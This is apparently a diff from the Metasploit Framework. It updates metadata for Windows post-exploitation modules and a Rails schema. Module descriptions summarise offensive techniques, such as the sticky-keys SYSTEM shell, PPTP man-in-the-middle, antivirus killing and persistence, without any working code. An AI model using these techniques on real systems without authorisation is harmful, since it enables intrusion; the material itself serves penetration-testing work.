@@ -219078,6 +221668,16 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -219106,7 +221706,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/archmigrate.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/archmigrate",
@@ -219142,7 +221742,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-08-08 01:40:15 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/change_password.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/change_password",
@@ -219178,7 +221778,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/clone_proxy_settings.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/clone_proxy_settings",
@@ -219204,7 +221804,7 @@
    "author": [
      "chao-mu"
    ],
-    "description": "This module deletes a local user account from the specified server,\n        or the local machine if no server is given.",
+    "description": "This module deletes a local user account from the specified server,\n          or the local machine if no server is given.",
    "references": [

    ],
@@ -219214,7 +221814,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/delete_user.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/delete_user",
@@ -219305,7 +221905,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/download_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/download_exec",
@@ -219341,7 +221941,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/driver_loader.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/driver_loader",
@@ -219377,7 +221977,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-20 14:12:01 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/enable_rdp.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/enable_rdp",
@@ -219413,7 +222013,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/enable_support_account.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/enable_support_account",
@@ -219440,7 +222040,7 @@
      "Nicholas Nam (nick <Nicholas Nam (nick@executionflow.org)>",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "This module will execute a powershell script in a meterpreter session.\n        The user may also enter text substitutions to be made in memory before execution.\n        Setting VERBOSE to true will output both the script prior to execution and the results.",
+    "description": "This module will execute a powershell script in a meterpreter session.\n          The user may also enter text substitutions to be made in memory before execution.\n          Setting VERBOSE to true will output both the script prior to execution and the results.",
    "references": [

    ],
@@ -219450,7 +222050,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/exec_powershell.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/exec_powershell",
@@ -219486,7 +222086,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/windows/manage/execute_dotnet_assembly.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/execute_dotnet_assembly",
@@ -219494,6 +222094,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -219568,7 +222177,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/hashcarve.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/hashcarve",
@@ -219605,7 +222214,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/ie_proxypac.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/ie_proxypac",
@@ -219641,7 +222250,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/inject_ca.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/inject_ca",
@@ -219677,7 +222286,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/inject_host.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/inject_host",
@@ -219714,7 +222323,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-02-24 20:24:57 +0000",
+    "mod_time": "2023-02-03 18:12:53 +0000",
    "path": "/modules/post/windows/manage/install_python.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/install_python",
@@ -219722,6 +222331,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -219740,7 +222359,7 @@
    "author": [
      "Michael Long <bluesentinel@protonmail.com>"
    ],
-    "description": "This module installs OpenSSH server and client for Windows using PowerShell.\n                        SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.",
+    "description": "This module installs OpenSSH server and client for Windows using PowerShell.\n          SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.",
    "references": [
      "URL-https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview",
      "URL-https://github.com/PowerShell/openssh-portable"
@@ -219751,7 +222370,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-01-19 19:51:44 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/install_ssh.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/install_ssh",
@@ -219791,7 +222410,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-07 14:01:53 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/killav.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/killav",
@@ -219839,7 +222458,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/migrate.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/migrate",
@@ -219875,7 +222494,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/mssql_local_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/mssql_local_auth_bypass",
@@ -219912,7 +222531,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/multi_meterpreter_inject.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/multi_meterpreter_inject",
@@ -219948,7 +222567,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/nbd_server.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/nbd_server",
@@ -219984,7 +222603,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/peinjector.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/peinjector",
@@ -220020,7 +222639,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-10-01 17:54:59 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/persistence_exe.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/persistence_exe",
@@ -220056,7 +222675,7 @@
    "author": [
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "This module uses the PortProxy interface from netsh to set up\n        port forwarding persistently (even after reboot). PortProxy\n        supports TCP IPv4 and IPv6 connections.",
+    "description": "This module uses the PortProxy interface from netsh to set up\n          port forwarding persistently (even after reboot). PortProxy\n          supports TCP IPv4 and IPv6 connections.",
    "references": [

    ],
@@ -220066,7 +222685,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/portproxy.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/portproxy",
@@ -220102,7 +222721,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/powershell/build_net_code.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/powershell/build_net_code",
@@ -220139,7 +222758,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-08-08 18:00:36 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/powershell/exec_powershell.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/powershell/exec_powershell",
@@ -220166,7 +222785,7 @@
      "Ben Turner benpturner <Ben Turner benpturner@yahoo.com>",
      "Dave Hardy davehardy20 <Dave Hardy davehardy20@gmail.com>"
    ],
-    "description": "This module will download and execute one or more PowerShell scripts\n        over a present powershell session.\n        Setting VERBOSE to true will show the stager results.",
+    "description": "This module will download and execute one or more PowerShell scripts\n          over a present powershell session.\n          Setting VERBOSE to true will show the stager results.",
    "references": [

    ],
@@ -220176,7 +222795,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-08-08 18:00:36 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/powershell/load_script.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/powershell/load_script",
@@ -220202,7 +222821,7 @@
    "author": [
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "This module initiates a PPTP connection to a remote machine (VPN server). Once\n        the tunnel is created we can use it to force the victim traffic to go through the\n        server getting a man in the middle attack. Be sure to allow forwarding and\n        masquerading on the VPN server (mitm).",
+    "description": "This module initiates a PPTP connection to a remote machine (VPN server). Once\n          the tunnel is created we can use it to force the victim traffic to go through the\n          server getting a man in the middle attack. Be sure to allow forwarding and\n          masquerading on the VPN server (mitm).",
    "references": [
      "URL-https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1"
    ],
@@ -220212,7 +222831,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/pptp_tunnel.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/pptp_tunnel",
@@ -220249,7 +222868,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/priv_migrate.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/priv_migrate",
@@ -220285,7 +222904,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-03-10 18:03:35 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/pxeexploit.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/pxeexploit",
@@ -220322,7 +222941,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/reflective_dll_inject.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/reflective_dll_inject",
@@ -220358,7 +222977,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/remove_ca.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/remove_ca",
@@ -220394,7 +223013,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/remove_host.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/remove_host",
@@ -220430,7 +223049,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/rid_hijack.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/rid_hijack",
@@ -220502,7 +223121,7 @@
    "author": [
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "This module enables the Remote Packet Capture System (rpcapd service)\n        included in the default installation of Winpcap. The module allows you to set up\n        the service in passive or active mode (useful if the client is behind a firewall).\n        If authentication is enabled you need a local user account to capture traffic.\n        PORT will be used depending of the mode configured.",
+    "description": "This module enables the Remote Packet Capture System (rpcapd service)\n          included in the default installation of Winpcap. The module allows you to set up\n          the service in passive or active mode (useful if the client is behind a firewall).\n          If authentication is enabled you need a local user account to capture traffic.\n          PORT will be used depending of the mode configured.",
    "references": [

    ],
@@ -220512,7 +223131,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/rpcapd_start.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/rpcapd_start",
@@ -220548,7 +223167,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/run_as.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/run_as",
@@ -220584,7 +223203,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/run_as_psh.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/run_as_psh",
@@ -220620,7 +223239,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/sdel.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/sdel",
@@ -220656,7 +223275,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-03-10 18:03:35 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/shellcode_inject.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/shellcode_inject",
@@ -220692,7 +223311,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/sshkey_persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/sshkey_persistence",
@@ -220719,7 +223338,7 @@
    "author": [
      "OJ Reeves"
    ],
-    "description": "This module makes it possible to apply the 'sticky keys' hack to a session with appropriate\n        rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP\n        login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting\n        for certain executables.\n\n        The module options allow for this hack to be applied to:\n\n        SETHC   (sethc.exe is invoked when SHIFT is pressed 5 times),\n        UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),\n        OSK     (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and\n        DISP    (DisplaySwitch.exe is invoked by pressing WINDOWS+P).\n\n        The hack can be added using the ADD action, and removed with the REMOVE action.\n\n        Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded\n        to the target prior to running the module. By default, a SYSTEM command prompt is installed\n        using the registry method if this module is run without modifying any parameters.",
+    "description": "This module makes it possible to apply the 'sticky keys' hack to a session with appropriate\n          rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP\n          login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting\n          for certain executables.\n\n          The module options allow for this hack to be applied to:\n\n          SETHC   (sethc.exe is invoked when SHIFT is pressed 5 times),\n          UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),\n          OSK     (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and\n          DISP    (DisplaySwitch.exe is invoked by pressing WINDOWS+P).\n\n          The hack can be added using the ADD action, and removed with the REMOVE action.\n\n          Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded\n          to the target prior to running the module. By default, a SYSTEM command prompt is installed\n          using the registry method if this module is run without modifying any parameters.",
    "references": [
      "URL-https://web.archive.org/web/20170201184448/https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit",
      "URL-https://blog.carnal0wnage.com/2012/04/privilege-escalation-via-sticky-keys.html"
@@ -220730,7 +223349,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-12-04 17:41:24 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/sticky_keys.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/sticky_keys",
@@ -220767,7 +223386,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-05 11:34:37 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/vmdk_mount.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/vmdk_mount",
@@ -220849,7 +223468,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/wdigest_caching.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/wdigest_caching",
@@ -220885,7 +223504,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/manage/webcam.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/webcam",
@@ -220921,7 +223540,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/recon/computer_browser_discovery.rb",
    "is_install_path": true,
    "ref_name": "windows/recon/computer_browser_discovery",
@@ -220957,7 +223576,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/recon/outbound_ports.rb",
    "is_install_path": true,
    "ref_name": "windows/recon/outbound_ports",
@@ -220993,7 +223612,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/wlan/wlan_bss_list.rb",
    "is_install_path": true,
    "ref_name": "windows/wlan/wlan_bss_list",
@@ -221029,7 +223648,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/wlan/wlan_current_connection.rb",
    "is_install_path": true,
    "ref_name": "windows/wlan/wlan_current_connection",
@@ -221065,7 +223684,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/wlan/wlan_disconnect.rb",
    "is_install_path": true,
    "ref_name": "windows/wlan/wlan_disconnect",
@@ -221101,7 +223720,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/wlan/wlan_probe_request.rb",
    "is_install_path": true,
    "ref_name": "windows/wlan/wlan_probe_request",
@@ -221137,7 +223756,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-08 13:47:34 +0000",
    "path": "/modules/post/windows/wlan/wlan_profile.rb",
    "is_install_path": true,
    "ref_name": "windows/wlan/wlan_profile",
@@ -10,15 +10,14 @@
 #
 # It's strongly recommended that you check this file into your version control system.

-ActiveRecord::Schema.define(version: 2019_05_07_120211) do
-
+ActiveRecord::Schema[7.0].define(version: 2019_05_07_120211) do
  # These are extensions that must be enabled in order to support this database
  enable_extension "plpgsql"

  create_table "api_keys", id: :serial, force: :cascade do |t|
    t.text "token"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "async_callbacks", id: :serial, force: :cascade do |t|
@@ -27,16 +26,16 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "listener_uri"
    t.string "target_host"
    t.string "target_port"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "automatic_exploitation_match_results", id: :serial, force: :cascade do |t|
    t.integer "match_id"
    t.integer "run_id"
    t.string "state", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["match_id"], name: "index_automatic_exploitation_match_results_on_match_id"
    t.index ["run_id"], name: "index_automatic_exploitation_match_results_on_run_id"
  end
@@ -44,8 +43,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  create_table "automatic_exploitation_match_sets", id: :serial, force: :cascade do |t|
    t.integer "workspace_id"
    t.integer "user_id"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["user_id"], name: "index_automatic_exploitation_match_sets_on_user_id"
    t.index ["workspace_id"], name: "index_automatic_exploitation_match_sets_on_workspace_id"
  end
@@ -54,8 +53,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "module_detail_id"
    t.string "state"
    t.integer "nexpose_data_vulnerability_definition_id"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.integer "match_set_id"
    t.string "matchable_type"
    t.integer "matchable_id"
@@ -68,8 +67,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "workspace_id"
    t.integer "user_id"
    t.integer "match_set_id"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.index ["match_set_id"], name: "index_automatic_exploitation_runs_on_match_set_id"
    t.index ["user_id"], name: "index_automatic_exploitation_runs_on_user_id"
    t.index ["workspace_id"], name: "index_automatic_exploitation_runs_on_workspace_id"
@@ -77,11 +76,11 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "clients", id: :serial, force: :cascade do |t|
    t.integer "host_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "ua_string", limit: 1024, null: false
    t.string "ua_name", limit: 64
    t.string "ua_ver", limit: 32
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
  end

  create_table "credential_cores_tasks", id: false, force: :cascade do |t|
@@ -96,8 +95,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do

  create_table "creds", id: :serial, force: :cascade do |t|
    t.integer "service_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "user", limit: 2048
    t.string "pass", limit: 4096
    t.boolean "active", default: true
@@ -110,9 +109,9 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  create_table "events", id: :serial, force: :cascade do |t|
    t.integer "workspace_id"
    t.integer "host_id"
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.string "name"
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.boolean "critical"
    t.boolean "seen"
    t.string "username"
@@ -123,7 +122,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "host_id"
    t.integer "service_id"
    t.integer "vuln_id"
-    t.datetime "attempted_at"
+    t.datetime "attempted_at", precision: nil
    t.boolean "exploited"
    t.string "fail_reason"
    t.string "username"
@@ -141,8 +140,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "session_uuid", limit: 8
    t.string "name", limit: 2048
    t.string "payload", limit: 2048
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
  end

  create_table "host_details", id: :serial, force: :cascade do |t|
@@ -157,7 +156,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "hosts", id: :serial, force: :cascade do |t|
-    t.datetime "created_at"
+    t.datetime "created_at", precision: nil
    t.inet "address", null: false
    t.string "mac"
    t.string "comm"
@@ -169,7 +168,7 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "os_lang"
    t.string "arch"
    t.integer "workspace_id", null: false
-    t.datetime "updated_at"
+    t.datetime "updated_at", precision: nil
    t.text "purpose"
    t.string "info", limit: 65536
    t.text "comments"
@@ -197,8 +196,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "listeners", id: :serial, force: :cascade do |t|
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.integer "workspace_id", default: 1, null: false
    t.integer "task_id"
    t.boolean "enabled", default: true
@@ -217,8 +216,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.string "ltype", limit: 512
    t.string "path", limit: 1024
    t.text "data"
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.string "content_type"
    t.text "name"
    t.text "info"
@@ -227,8 +226,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
  end

  create_table "macros", id: :serial, force: :cascade do |t|
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
    t.text "owner"
    t.text "name"
    t.text "description"
@@ -243,8 +242,8 @@ ActiveRecord::Schema.define(version: 2019_05_07_120211) do
    t.integer "public_id"
    t.integer "realm_id"
    t.integer "workspace_id", null: false
-    t.datetime "created_at", null: false
-    t.datetime "updated_at", null: false
+    t.datetime "created_at", precision: nil, null: false
+    t.datetime "updated_at", precision: nil, null: false
